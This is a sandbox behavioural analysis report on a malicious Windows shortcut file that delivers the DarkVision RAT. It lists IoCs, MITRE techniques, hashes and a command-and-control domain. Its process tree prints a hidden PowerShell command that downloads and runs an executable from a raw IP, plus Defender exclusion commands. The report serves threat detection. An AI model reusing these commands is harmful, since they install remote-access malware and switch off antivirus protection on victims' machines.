Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 03:00
Static task
static1
Behavioral task
behavioral1
Sample
aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2.lnk
Resource
win10v2004-20241007-en
General
-
Target
aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2.lnk
-
Size
2KB
-
MD5
7f070dfbaa6893bb2effac0f2320a1d7
-
SHA1
293e7f6f6e70a0c7699215b3402dc5ff2bb2bfaa
-
SHA256
aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2
-
SHA512
720b2a90dd051160aeaa1a11a70433213b96f04e8d160c55c699f4fd6af7f1c07db61e110e684d9ce91ad79e987bd809497eb2d52ac2f3bd96cdb289c443b883
Malware Config
Extracted
darkvision
acuweld.ddns.net
Signatures
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 4788 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 4788 powershell.exe 4788 powershell.exe 1828 powershell.exe 2828 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk explorer.exe -
Executes dropped EXE 2 IoCs
pid Process 4756 file.exe 2708 windows.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4788 powershell.exe 4788 powershell.exe 1828 powershell.exe 1828 powershell.exe 2828 powershell.exe 2828 powershell.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 2708 windows.exe 2708 windows.exe 2708 windows.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4788 powershell.exe Token: SeDebugPrivilege 1828 powershell.exe Token: SeDebugPrivilege 2828 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2368 wrote to memory of 4788 2368 cmd.exe 83 PID 2368 wrote to memory of 4788 2368 cmd.exe 83 PID 4788 wrote to memory of 4756 4788 powershell.exe 84 PID 4788 wrote to memory of 4756 4788 powershell.exe 84 PID 4756 wrote to memory of 2172 4756 file.exe 85 PID 4756 wrote to memory of 2172 4756 file.exe 85 PID 4756 wrote to memory of 2708 4756 file.exe 87 PID 4756 wrote to memory of 2708 4756 file.exe 87 PID 2172 wrote to memory of 1828 2172 cmd.exe 88 PID 2172 wrote to memory of 1828 2172 cmd.exe 88 PID 2708 wrote to memory of 1516 2708 windows.exe 89 PID 2708 wrote to memory of 1516 2708 windows.exe 89 PID 2708 wrote to memory of 3560 2708 windows.exe 91 PID 2708 wrote to memory of 3560 2708 windows.exe 91 PID 1516 wrote to memory of 2828 1516 cmd.exe 92 PID 1516 wrote to memory of 2828 1516 cmd.exe 92
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'4⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
-
C:\ProgramData\windows\windows.exe"C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'5⤵
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"5⤵
- Checks BIOS information in registry
- Drops startup file
PID:3560
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5eb4d127b8a6f84a1cee423c5e3e3a51d
SHA1c55263a8ff097067f2393ce2120801a445fd1949
SHA256d73b077e2ae7f7608ebf774fb83ab13c7bc7a5c3e4d9d96fda2bf695dc698514
SHA51245a52004f8b63ac089de017437ba0e03335f18469942795d36ce3c3d017f842e582103c91e07d9af0fa8dfbbe6f2f68f2fac91383a48b6535952a8630911f21e
-
Filesize
944B
MD5ccdcc9463240308209faf0e18086868e
SHA15c3a3813f02e9575888d61a81eb5777352336450
SHA256bb9b166206e40b8e4a9fd52ad1a5c3314d242967e6bedda4a38c9ec33d011751
SHA5126f8180054490ca0ebcf90c77d5f8f21f70d69cd351143659d3907a41bf8c6be61f8dd2ce255e3a82ddcfba787e9fd20caa98040a5922120e6325b13f2a333893
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.0MB
MD5d37285bf0331c7514e5e4cec0fbe647c
SHA12a83f532b50fb5acd4f417c2ce51a1eac1bb9c08
SHA256f96c269716f360aa2fbb1926dda79c3ff47ea7d8ec6615cde06b205d28400f79
SHA512d1a9f56a504bc6d13a0af3ac1caf97d9bc86ace60577b87a2f7143c3c94ade29605559b9122c19d2a8ca2f817d6efe123a24c75012b9c22241fbcdf2938b1d81